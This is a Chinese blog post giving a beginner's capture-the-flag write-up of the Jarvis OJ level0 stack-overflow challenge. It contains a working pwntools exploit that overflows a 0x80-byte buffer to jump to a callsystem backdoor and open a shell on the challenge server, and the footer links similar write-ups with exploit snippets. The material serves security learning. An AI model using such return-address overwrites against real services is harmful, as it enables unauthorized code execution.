jarvis oj level0

最新推荐文章于 2023-05-27 18:32:55 发布
最新推荐文章于 2023-05-27 18:32:55 发布
阅读量894 收藏 2
点赞数
分类专栏: pwn 文章标签: pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41617275/article/details/84677764
版权

菜鸟入门,先从level0开始下手。

首先checksec,发现开启了nx保护。

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

拖进64位ida,查看vulnerable_function

ssize_t vulnerable_function()
{
  char buf; // [rsp+0h] [rbp-80h]
  return read(0, &buf, 0x200uLL);
}

发现开辟了0x80的缓冲区,读取了0x200的内容,同时幸运地发现了callsystem函数,考虑缓冲区保护了,可以将返回地址覆盖为callsystem地址。

正常vulnerable函数栈如下:

vul_ret_address
ebp
buf

栈的增长方向是从高地址向低地址。
在这里插入图片描述
我们要做的是把vul_ret_address覆盖成callsystem地址。
构造payload=‘a’*0x80+‘junk-ebp’+p64(sys_addr)
脚本如下:

from pwn import *
context.log_level="debug"
p=remote("pwn2.jarvisoj.com",9881)    
e=ELF("level0")                                 
sys_addr=e.symbols['callsystem']
payload='a'*0x80+'junk-ebp'+p64(sys_addr)
p.send(payload)
p.interactive()
p.close()

几个收获:
pwntools的使用。函数运行时栈的状态,函数运行时先push ebp,将原栈底地址入栈。ebp栈底指针,esp栈顶指针,esp会一直变化。调用函数时须先将下一跳地址压栈,即调用完函数的返回地址。
分享一篇入门好文章
**除了system('/bin/sh')还有system($0)execve函数组可以用。

遗留问题:
通过e.symbols['system']和e.search('/bin/sh').next()获取bin/sh地址和system地址,构造system("/bin/sh")为什么不行?没想明白以后再看
知道了,level0是64位程序,参数不保存在栈上,可以利用pop rdi,类似于level3_x64
一开始以为recv()没什么用,还是需要用recv,只有recv了,服务器返回的字符串才会从缓存中丢弃,要不可能recv的是上一条返回值,要注意。

发蝴蝶和大脑斧
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jarvisoj_level0
weixin_56301399的博客
07-21 573
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
[BUUCTF]PWN8——jarvisoj_level0
mcmuyanga的博客
08-26 553
[BUUCTF]PWN8——jarvisoj_level0 题目网址:https://buuoj.cn/challenges#jarvisoj_level0 步骤: 例行检查,64位,开启了NX保护 nc一下,看看程序的大概执行流程,回显Hello,world之后让我们输入 用64位ida打开,shift+f12查看字符串,发现了 system 和 /bin/sh 双击跟进,ctrl+x找到调用 /bin/sh 的函数,找到了程序里的后门,shell_addr=0x400596 根据
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
Jarvis声音.zip
09-28
"Jarvis声音.zip"这个压缩包文件显然与流行的科幻角色——钢铁侠托尼·斯塔克的人工智能助手Jarvis有关。Jarvis,全名Just A Rather Very Intelligent System,是漫威宇宙中的一个标志性元素,其在电影中以其独特、...
jarvis音频.zip
07-31
"JARVIS_֪ͨ_1.m4r"可能是贾维斯的语音信息提示,"JARVIS_日历提醒_1.m4r"则能在日程提醒时带来钢铁侠团队的智能感,而"JARVIS_新信息_2.m4r"和"JARVIS_新语音信箱_1.m4r"则是针对新消息和语音留言的特别提示,让你...
【BUUCTF - PWNjarvisoj_level0
古月浪子的博客
04-05 660
checksec一下,栈溢出 IDA打开看看,很明显的溢出和后门函数,一道白给题 from pwn import * from LibcSearcher import * context.os='linux' context.arch='amd64' context.log_level='debug' sl=lambda x:io.sendline(x) rl=lambda :io.rec...
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3528
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
BUUCTF刷题之路-jarvisoj_level01
最新发布
qq_30528603的博客
05-27 208
看到个read函数,而且能输入的最大字节数为512字节。而buf我们看到是128字节的限度,那应该是存在栈溢出的问题。而且我们直接看到有个后门函数,和前面几题的套路如出一辙。
jarvisoj_level1
m0sway的博客
12-03 2231
jarvisoj_level1 使用checksec查看: 保护全关,并且还有RWX区域。栈溢出的题目的话直接ret2shellcode即可。 放进IDA中查看: 主函数中直接给出漏洞函数: 妥妥的一个栈溢出了,程序会输出buf的地址。 查看了下字符串也没有关键字符串,看来就是ret2shellcode 然而…BUU上的环境可能有点问题。并不能打通。 于是…使用ret2libc的方式。用write泄露libc的地址,然后捣鼓捣鼓。 exp: from pwn import * from six imp
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1199
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1650
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
铁人三项_第五赛区_2018_rop
z1r0的博客
12-05 143
铁人三项_第五赛区_2018_rop 查看保护 溢出,ret2libc from pwn import * context(arch='i386', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27080) else: r = process(file_name) elf = ELF(file_name) def dbg(
babyheap_0ctf_2017
Morphy_Amo的博客
03-02 283
BUUCTF 靶场 CTF wiki 安全策略 [*] '/root/ctf/buuctf/pwn/babyheap_0ctf_2017' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 这题防护全开,尤其注意开启了Full RELRO,这样没办法通过劫持GOT表来getshell,可以

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值